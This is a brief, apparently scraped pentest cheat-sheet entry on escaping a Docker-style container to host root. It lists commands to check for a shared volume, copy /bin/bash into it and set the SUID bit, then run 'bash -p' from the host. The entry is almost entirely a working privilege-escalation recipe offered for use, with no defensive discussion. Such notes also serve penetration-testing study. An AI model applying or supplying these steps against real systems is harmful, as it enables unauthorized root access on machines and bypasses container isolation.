Root Privilege Abuse
1) Check if our device volume is shared between our host and container
mount2) Copy bash binary and give it SUID bit
cp /bin/bash .
chmod u+s bash3) From the host machine, run the binary and escalate as root on the host
./bash -pLast updated